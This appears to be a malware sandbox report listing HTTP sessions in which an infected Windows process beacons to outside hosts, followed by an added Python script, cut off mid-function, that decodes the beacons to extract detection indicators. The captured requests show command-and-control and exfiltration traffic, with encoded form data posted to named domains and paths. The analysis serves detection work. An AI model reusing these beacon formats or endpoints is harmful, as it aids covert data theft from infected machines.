Data Ascii: BTV4RR_=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba3z/5i+vpTyzda8znbWaDCHzIpoWtnsS9rJLq7ik1NhryiWLV5vE4gJr68TEa1aAXcJ7DVrSy1c+tkx96tgS2EOTUD4kwI57p9TN0Ye1mX1blDp6kcwA0wvbBiLMgRMJSOkBMR/7kiit8u9uAleebGBdLIomKvmbAoUE4OtGXHh4c+CSOo3d1GDE+ffgXRFzGPxonPKYBdDdQyNthHNRMflOyWl9W5ro1MIN7Rjj5yavtuqBOgJK6lIyCDQxfa4cct4G9WXuN+vfJDLkB4rKC67dIoExVPXAQHSkulapLdzp8Hb12X+bmKlZciGU9Y2SHVX+CYj5rljxy1aYD77ojvY6Q3x8nUzYGI4nkEKAslgzb4RrklgJTewFzuBAokyOn2Wm5ujN7CJ1CDDTAPM7PLfR2u5oD3i348vs2o0l/n0g5kwQYIkyw0xnbxudccmsV9TS8hNHLBwWEmkXn5mKFhh9u9LQECh50U//pA6xQaifqBlGZATGi6gloEdsPxViOxTdoUCKLsmZzSk=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
--- | --- | --- | --- | --- | --- | ---
3 | 192.168.2.24 | 49786 | 84.32.84.32 | 80 | 6880 | C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe

Timestamp | Bytes transferred | Direction | Data
--- | --- | --- | ---
Dec 13, 2024 13:18:33.608782053 CET | 12360 | OUT | POST /z4qr/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 45184
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Host: www.thesnusgang.fun
Origin: http://www.thesnusgang.fun
Referer: http://www.thesnusgang.fun/z4qr/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Data Ascii: BTV4RR_=4bxAs9WIczJni8lwEKcvSmmO6iB7jlXYaivD72+ba2L/5zevp0mzca8zt7WfDCG2Ipwatgkk9tFLzKSkyuJrkCWEZZv0uQJv68Dya0L9Xdt7FznS10c9iEx7wNgN7kOoUDogwIF7qNPN0a61mG1bmjp60cxK9QrqBiLIgQpcT9sBMCb7tSis6e9SBlfbKWBaLJMmKr2bA/gE5vNGFXh5VeCSBI3P7n+w+feXXTpJGOho1a2YL4+vSSMfiHNfB/lEyW5HW5zo1YoN7hzj91Ooq+qMBAJIwFFWCDI1fbYyfewG9V/ubPvfeDLkD4rAfq7YIoExVP7ARwqk8A2pc+Lo+3b343/LmKhIciaM9dbXAmD+CvL5vXLwx1afJb7+nvkFQzZCnWHYGc0nqVKApSUyTYRnsFgGe+wJzu16okXVnFCm5uTN7CJ1CDDVDPMFPLfd2u5kD36d48ns2pkl/kMj/Ex3QokCpkx8bwGKccW8WKPS8VRHKBwRJ2lQn5mXIBgNu8/iEBxp0H3/pFqxIry/8zR5bSCm7JomtmFCCh50RBrB2HXBe5+IuWj69asvD25BpUVHz+W74imb8JeHaFqDPsWeD832OgMnniS9K8jiSS6q66t6WGiujSiEsRfSrpBu2JmKFq+6rTrGPr53AELtXWWB7rxu9iLolBfrHF0hQhhaqFJGadGZEhF937nhx36Voz3Jb9xEBCgIYaKw7JvqpJt5nr932ov2kU1aEU02QkhIk8jLMyt+9/puA23EBRYpJTLIxt9hQVqDjFX2Hj4X9By+7NbEBk0IzAryu37Y+IGb+O6RXb1izB4ijikPW/z/RN5g4mOQUlyUz9DQtn13dPFeRLkCXErZfzJ6Ab5v8LlHrgtRb4lOnAyUjrqjnfO/BNsmrWwPN77yWI4Vz+j8HU8J5WggPRd9oqoMbbCbRdXiwS5+Uyfulkix96ZKqxN5ai+YljAc3Dgh9bQ1QMxg1qkpjD2+URYDlqxbvqHGm7QC [TRUNCATED]
                                                      Dec 13, 2024 13:18:33.730010033 CET12360OUTData Raw: 6e 2f 49 35 77 36 61 4b 53 50 64 59 65 43 79 47 36 49 67 59 68 75 5a 6f 2b 58 5a 4c 6e 72 6c 4c 6b 64 36 4c 69 34 2f 75 61 79 4a 4e 6e 66 34 76 62 79 77 68 70 6b 35 51 33 62 43 74 4f 73 73 70 48 6a 47 33 72 4f 72 44 71 77 54 4b 75 73 69 6a 79 6a
                                                      Data Ascii: n/I5w6aKSPdYeCyG6IgYhuZo+XZLnrlLkd6Li4/uayJNnf4vbywhpk5Q3bCtOsspHjG3rOrDqwTKusijyja4GL3Qml9+yoKSR5zGGtAcJqoSw8Xs4BL4X7oQdgwsP4ZPQURXgT0rruNNV4R4IaNvxPtO5/VI/cufn22ZMn2pE+8TRgQM1+pAHEVlNv0C1cFnun5ZNFYWv6HtYMEE318GzOgzJNnUDominVJHI27vQy3tKUnwVWC
                                                      Dec 13, 2024 13:18:33.730194092 CET7416OUTData Raw: 66 37 68 30 43 35 31 50 63 46 5a 6c 42 61 33 41 70 65 6f 38 57 6a 75 70 7a 78 71 51 65 52 44 62 43 73 49 41 2b 6c 37 67 72 77 46 64 5a 6c 49 4a 75 62 79 59 7a 42 65 42 35 55 59 52 69 73 77 70 6b 6c 7a 69 33 58 73 68 35 66 77 45 4a 5a 54 49 75 2b
                                                      Data Ascii: f7h0C51PcFZlBa3Apeo8WjupzxqQeRDbCsIA+l7grwFdZlIJubyYzBeB5UYRiswpklzi3Xsh5fwEJZTIu+bARCDfxyrIWKCmfoupRx1an6bn7eylSG9U6xgBsxi5lJFojNlrFDvQq5sSu6iL6W84+ga5dOAChF2fGSjdUEIKOl+79fITExHdn9yKTiW6rGkNZ1Y1sl9vo5jfW7eZppR661Yzngip7sAC55vSJUyz9pebgWpfY+o
                                                      Dec 13, 2024 13:18:33.730423927 CET4944OUTData Raw: 4b 75 37 57 59 47 7a 37 6b 6d 75 36 33 6d 6e 37 56 6e 78 70 79 7a 59 59 79 58 37 36 56 4c 64 70 59 39 64 43 6d 59 4e 50 50 72 2b 79 46 78 67 79 6d 38 57 62 78 2b 4b 74 38 7a 74 6b 58 4f 45 64 37 37 76 4e 46 77 36 76 44 36 42 48 79 4a 66 7a 63 47
                                                      Data Ascii: Ku7WYGz7kmu63mn7VnxpyzYYyX76VLdpY9dCmYNPPr+yFxgym8Wbx+Kt8ztkXOEd77vNFw6vD6BHyJfzcGGqVT76ds+nKW9WWBMJ4MZ0uPDskikmCQV3+o07q8r4f5UNZghkGjXedl1WgruaBkevgIS+EIQslVN4K6krPFonCI5Qw5zaLVNOBpI1jSShfzZ6IkLp1MGOdU2qo3dI0ge62VBh6Qdwtzg7DwO89sBR2sctRiH18X4
                                                      Dec 13, 2024 13:18:33.850193977 CET | 2472 | OUT | Data Raw: 74 52 30 6d 51 4a 52 34 51 71 5a 37 34 62 79 71 6a 64 4d 41 36 49 51 6b 74 44 6c 5a 58 2b 2b 6c 73 59 69 78 2f 7a 38 31 7a 70 43 44 76 72 53 2f 4d 6b 66 67 6f 30 44 4c 70 57 50 64 34 36 47 48 63 56 6c 53 38 2b 49 41 55 6f 58 61 6f 4e 65 77 56 39
                                                      Data Ascii: tR0mQJR4QqZ74byqjdMA6IQktDlZX++lsYix/z81zpCDvrS/Mkfgo0DLpWPd46GHcVlS8+IAUoXaoNewV9nbKpU0zj2mG7zWa8qxjWIqF+xaLC6Zs9VJmMQL+K+us35XDorMsMv7mROSgMWqiW9MYbXuL6PVxGXnl1Y04MXTYCReLYeVOLbgOCnn2fgZ87UARIpISCuLTo6IYEcVyxK4X8FjZCFaCr08VhfKNb5IqxZtuTEcTuD
                                                      Dec 13, 2024 13:18:33.850233078 CET | 2472 | OUT | Data Raw: 54 49 38 4d 50 6e 2f 75 41 37 46 6c 6c 67 4d 5a 44 58 6e 73 38 44 58 53 78 2b 30 61 47 47 56 44 36 63 33 4f 73 33 37 6b 68 36 46 6f 43 72 68 62 54 73 35 4b 47 67 68 64 41 42 71 44 32 59 6b 74 34 70 42 73 64 4e 30 56 30 39 42 49 68 6b 6a 63 43 68
                                                      Data Ascii: TI8MPn/uA7FllgMZDXns8DXSx+0aGGVD6c3Os37kh6FoCrhbTs5KGghdABqD2Ykt4pBsdN0V09BIhkjcCh9/e7ReQME5zYvL+oMWj4V8cBAHHHV4MzVHgkrHoQs0Aq8orZs3aBGgGvMmzwtKhk4IbrRvW7yDy5COCUqk7vR9PKiYHS/Er2vwLoDeT0cpV9BU2LjUtyxQSKQAqW2NvQ7GCHDebF5/FoiXcl+6bj1WzPd0KdAO4gG
                                                      Dec 13, 2024 13:18:33.850250959 CET | 2472 | OUT | Data Raw: 69 7a 43 44 42 4c 76 58 31 38 53 41 41 76 62 75 76 76 64 61 6f 79 4d 6c 61 47 4f 45 4e 49 41 35 72 32 74 59 6b 47 47 71 56 56 74 47 38 38 77 73 44 65 67 73 7a 4f 73 4d 75 79 59 67 44 48 53 54 2b 55 47 6d 54 31 75 30 41 72 70 38 4c 46 32 2f 38 65
                                                      Data Ascii: izCDBLvX18SAAvbuvvdaoyMlaGOENIA5r2tYkGGqVVtG88wsDegszOsMuyYgDHST+UGmT1u0Arp8LF2/8exUgAwPXrcqTCAE/f/gak7iCbGJXlGj6QGphZ21iIgadYcYXyUtcT2LGVDkPqLYCeGGxPYMMkVE+KWKG2G3ILAsUKUycyKa0quoXO/vICv0v0UrMzQlf45F5+iozEM5ijyiQvVMdPRpNRNjFdkqFZY1slC4BlE6g0q
                                                      Dec 13, 2024 13:18:33.850294113 CET | 1205 | OUT | Data Raw: 70 44 32 73 77 33 6f 30 69 76 70 77 42 50 32 66 50 2b 78 74 45 2b 41 61 50 68 45 4c 48 7a 70 72 48 63 75 74 75 6a 47 4e 39 76 6c 56 76 34 31 67 4b 59 31 5a 61 4d 4f 51 2f 6e 46 46 6a 59 71 63 47 6f 6b 63 63 63 45 4f 58 51 2f 45 45 31 39 79 49 51
                                                      Data Ascii: pD2sw3o0ivpwBP2fP+xtE+AaPhELHzprHcutujGN9vlVv41gKY1ZaMOQ/nFFjYqcGokcccEOXQ/EE19yIQ4gsSckDj/7PkMxLpCMeGuvtWz1S1Z5NTfIyRhBVmxD7KaEzYfWIc5aEx3QHFy1FTyT602F2kIu//uc73ZFzmYG4YoBTl17nCtUlO36LXBPR9sEnJvH+RhFpY95u1eteG46S/fu+nTWC8uuAJKdTEBR0JEFPfAlzkg


                                                      Session ID: 4 | Source IP: 192.168.2.24 | Source Port: 49788 | Destination IP: 84.32.84.32 | Destination Port: 80 | PID: 6880 | Process: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:18:36.288033009 CET | 443 | OUT | GET /z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.thesnusgang.fun
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Dec 13, 2024 13:18:37.445281982 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Fri, 13 Dec 2024 12:18:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 9973
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Server: hcdn
                                                      alt-svc: h3=":443"; ma=86400
                                                      x-hcdn-request-id: 4608d3c17ea731b2effb1c4c4560a1f7-bos-edge4
                                                      Expires: Fri, 13 Dec 2024 12:18:36 GMT
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                      Dec 13, 2024 13:18:37.445369005 CET | 1236 | IN | Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                      Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                      Dec 13, 2024 13:18:37.445426941 CET | 1236 | IN | Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                      Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                      Dec 13, 2024 13:18:37.445461988 CET | 1236 | IN | Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                      Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                      Dec 13, 2024 13:18:37.445497990 CET | 1236 | IN | Data Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                      Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                      Dec 13, 2024 13:18:37.445530891 CET | 1236 | IN | Data Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                      Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                      Dec 13, 2024 13:18:37.445569038 CET | 1236 | IN | Data Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                      Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                      Dec 13, 2024 13:18:37.445602894 CET | 1236 | IN | Data Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                      Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                      Dec 13, 2024 13:18:37.445640087 CET | 424 | IN | Data Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                      Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                      Session ID: 5 | Source IP: 192.168.2.24 | Source Port: 49789 | Destination IP: 172.67.155.214 | Destination Port: 80 | PID: 6880 | Process: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 13:18:43.127372026 CET | 710 | OUT | POST /oizn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.telepzow.fit
                                                      Origin: http://www.telepzow.fit
                                                      Referer: http://www.telepzow.fit/oizn/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 2f 68 75 43 4f 67 64 63 42 6c 71 53 4f 49 78 6d 75 4b 38 59 63 4e 6b 55 4b 7a 55 6f 4b 6b 45 51 68 73 7a 41 76 76 47 45 31 63 57 52 6d 47 77 4e 72 4e 43 2b 74 78 6a 35 71 4b 72 64 63 69 6c 49 48 68 44 45 6c 65 65 54 41 59 4b 72 57 4c 43 4e 47 71 70 74 5a 7a 44 44 51 72 55 34 44 4b 4e 33 44 5a 4d 70 6f 6b 49 49 6c 61 73 51 49 4d 38 6b 36 68 43 70 38 52 51 4b 31 47 48 48 46 48 58 30 44 64 51 58 4e 73 52 53 4d 71 76 44 65 75 78 2f 79 6e 4c 52 75 75 71 52 76 62 42 75 75 70 50 36 56 34 51 45 70 76 36 61 48 35 53 6d 61 55 39 6d 56 47 7a 4c 67 3d 3d
                                                      Data Ascii: BTV4RR_=jSLLzUo1Ntko5/huCOgdcBlqSOIxmuK8YcNkUKzUoKkEQhszAvvGE1cWRmGwNrNC+txj5qKrdcilIHhDEleeTAYKrWLCNGqptZzDDQrU4DKN3DZMpokIIlasQIM8k6hCp8RQK1GHHFHX0DdQXNsRSMqvDeux/ynLRuuqRvbBuupP6V4QEpv6aH5SmaU9mVGzLg==
                                                      Dec 13, 2024 13:18:44.714015961 CET | 917 | IN | HTTP/1.1 404 Not Found
                                                      Date: Fri, 13 Dec 2024 12:18:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eAqeDgL%2B9IYgjwd35JsDeYRc520WXQ1tG0wOTC7AGli1LT4S6mCK7I3oeZyj%2FOYoIa8UazPBsoC1bJHcaux1YI4dkx3aeaByHXc2FnM2BZLEekPa%2FXJN8jwM82UgjRvx1pK"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f15e6013cb98cbf-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=710&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0

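Decoding the beacons in sessions 4 and 5 above, as an added example that is not part of the Joe Sandbox report and not code from the sample. The request bytes are transcribed from the capture (session 4's GET, session 5's POST, and session 5's chunked, gzip-encoded 404 reply taken from its Data Raw hex, reply headers abridged). The indicator checks (a self-referencing Origin/Referer, raw base64 characters in a form body that a browser would have percent-encoded, Connection: close on every request, the shared parameter name) are this example's own heuristics, not Joe Sandbox or Suricata rules.

```python
"""Decode the HTTP beacons captured above and pull out the indicators an analyst
pivots on (host, path, parameter name, opaque payload size) plus a few tells that
the client was not the browser its User-Agent claims to be.

Added example, not code from Joe Sandbox or from the sample. GET_BEACON and
POST_BEACON are transcribed from sessions 4 and 5; POST_REPLY is session 5's
chunked, gzip-encoded 404 (headers abridged, body bytes from the Data Raw hex).
The indicator heuristics are this example's own, not Joe Sandbox or Suricata rules.
"""
import base64
import gzip

UA = b"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0"
ACCEPT = b"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8"

# Session 4: GET beacon to www.thesnusgang.fun (answered with a Hostinger parked page).
GET_BEACON = (
    b"GET /z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf HTTP/1.1\r\n"
    + b"Accept: " + ACCEPT + b"\r\n"
    + b"Accept-Language: en-US,en;q=0.9\r\n"
    + b"Connection: close\r\n"
    + b"Host: www.thesnusgang.fun\r\n"
    + b"User-Agent: " + UA + b"\r\n\r\n"
)

# Session 5: POST beacon to www.telepzow.fit (Content-Length 204 = 8 bytes of "BTV4RR_=" + 196 of base64).
POST_BEACON = (
    b"POST /oizn/ HTTP/1.1\r\n"
    + b"Accept: " + ACCEPT + b"\r\n"
    + b"Accept-Encoding: gzip, deflate, br\r\n"
    + b"Accept-Language: en-US,en;q=0.9\r\n"
    + b"Content-Length: 204\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Connection: close\r\n"
    + b"Cache-Control: no-cache\r\n"
    + b"Host: www.telepzow.fit\r\n"
    + b"Origin: http://www.telepzow.fit\r\n"
    + b"Referer: http://www.telepzow.fit/oizn/\r\n"
    + b"User-Agent: " + UA + b"\r\n\r\n"
    + b"BTV4RR_=jSLLzUo1Ntko5/huCOgdcBlqSOIxmuK8YcNkUKzUoKkEQhszAvvGE1cWRmGwNrNC+txj5qKrdcilIHhDEleeTAYKrWLCNGqptZzDDQrU4DKN3DZMpokIIlasQIM8k6hCp8RQK1GHHFHX0DdQXNsRSMqvDeux/ynLRuuqRvbBuupP6V4QEpv6aH5SmaU9mVGzLg=="
)

# Session 5 reply: one 0x74-byte chunk holding a gzip member, then the terminating zero chunk.
POST_REPLY = (
    b"HTTP/1.1 404 Not Found\r\n"
    + b"Content-Type: text/html\r\n"
    + b"Transfer-Encoding: chunked\r\n"
    + b"Connection: close\r\n"
    + b"Server: cloudflare\r\n"
    + b"Content-Encoding: gzip\r\n\r\n"
    + bytes.fromhex(
        "37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49"
        " b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc"
        " 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46"
        " c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a"
    )
)


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def split_form(data: str) -> dict:
    """k=v&k=v splitter that does NOT percent-decode. The beacon sends raw base64
    ('+', '/', '=') that a browser would have escaped; urllib.parse.parse_qs would
    turn '+' into a space and corrupt the blob."""
    fields = {}
    for pair in data.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = value
    return fields


def beacon_indicators(raw: bytes) -> dict:
    """Extract pivot points and not-a-browser tells from one captured request."""
    start, headers, body = parse_http(raw)
    method, target, _ = start.split(" ", 2)
    path, _, query = target.partition("?")
    fields = split_form(body.decode("latin-1") if method == "POST" else query)
    # The opaque payload is the longest field; the GET variant also carries a short "Tr" field.
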